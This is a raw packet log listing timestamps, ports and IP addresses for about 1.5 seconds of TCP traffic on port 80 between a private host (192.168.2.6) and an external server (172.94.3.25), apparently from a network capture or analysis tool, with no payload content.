Sep 25, 2024 16:03:50.141796112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.141841888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.141854048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.141943932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.142052889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.142183065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171046972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171061993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171080112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171204090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171308041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171320915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171339035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171351910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171364069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171377897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171377897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171377897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171399117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171421051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171516895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171536922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171557903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171571016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171585083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171595097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171626091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171627045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171627045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171636105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171694994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171705961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.171725035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.171803951 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.181333065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.181432009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.218333006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.218348026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.218359947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.218611956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.251362085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251382113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251399994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251411915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251432896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251446009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251456976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251463890 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.251470089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251482010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251492023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251503944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251517057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.251550913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.251576900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.259746075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.259763956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.259871006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.296896935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.296916962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.296930075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.296993017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327272892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327291965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327305079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327377081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327400923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327406883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327414989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327439070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327450991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327456951 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327487946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327501059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327502012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327584028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327833891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327887058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.327891111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327903986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327975988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327986002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.327997923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.328025103 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.328025103 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.374263048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.374450922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.374469042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.374483109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.374558926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405420065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405466080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405539036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405595064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405627012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405658960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405661106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405659914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405697107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405719042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405730963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405750990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405802011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405848980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405853987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405889034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405916929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.405946016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.405967951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406002045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406038046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406070948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406079054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.406079054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.406152010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406188965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.406209946 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.452624083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.452770948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.452788115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.452801943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.452900887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.483668089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483689070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483725071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483737946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483750105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483762026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483773947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483798027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.483849049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.483947992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.483989954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484003067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484034061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.484138012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484153986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484165907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484179020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.484181881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.484200001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.493737936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.493753910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.493818998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.530822992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.530842066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.530864000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.530874968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.530944109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.530998945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.561696053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561717033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561728954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561741114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561923981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.561958075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561970949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.561983109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562012911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562036037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562057018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562083006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562098026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562144041 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562236071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562247038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562267065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562277079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562279940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562289953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562326908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562424898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562438011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562448978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562473059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562491894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.562499046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562514067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.562566042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.609205961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.609234095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.609244108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.609255075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.609330893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640250921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640288115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640342951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640353918 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640377998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640409946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640429020 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640445948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640491009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640513897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640547037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640582085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640592098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640609980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640657902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640665054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640719891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640749931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640768051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640783072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640816927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640830994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640850067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640883923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640901089 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.640917063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.640959978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.687268972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.687314034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.687350988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.687407970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.687526941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.687597990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718029976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718050003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718063116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718137026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718166113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718203068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718214989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718223095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718251944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718259096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718265057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718291044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718302965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718313932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718318939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718346119 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718528986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718580961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718583107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718592882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718636990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.718661070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718673944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718683958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.718717098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.764941931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.775693893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.775708914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.775847912 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796243906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796276093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796288013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796298027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796310902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796322107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796334028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796339989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796346903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796415091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796422958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796464920 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796497107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796498060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796508074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796556950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796739101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796786070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796797991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796829939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796840906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796847105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796852112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.796875954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.796899080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874248981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874265909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874283075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874294996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874320030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874330997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874341965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874355078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874392986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874444008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874475002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874485970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874496937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874525070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874737978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874775887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874815941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874825954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874836922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874845982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874854088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874857903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874888897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.874919891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.874953032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.875143051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.875180960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.875190973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.875224113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.952506065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952527046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952545881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952559948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952569962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952581882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952600002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952626944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952671051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.952673912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952689886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.952696085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.952755928 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.953402996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953414917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953425884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953437090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953447104 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.953448057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953459024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953470945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953485966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.953490019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.953515053 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.953535080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.962641001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.014985085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:51.629179001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629203081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629215956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629229069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629242897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:51.629256010 CEST	80	49715	172.94.3.25	192.168.2.6
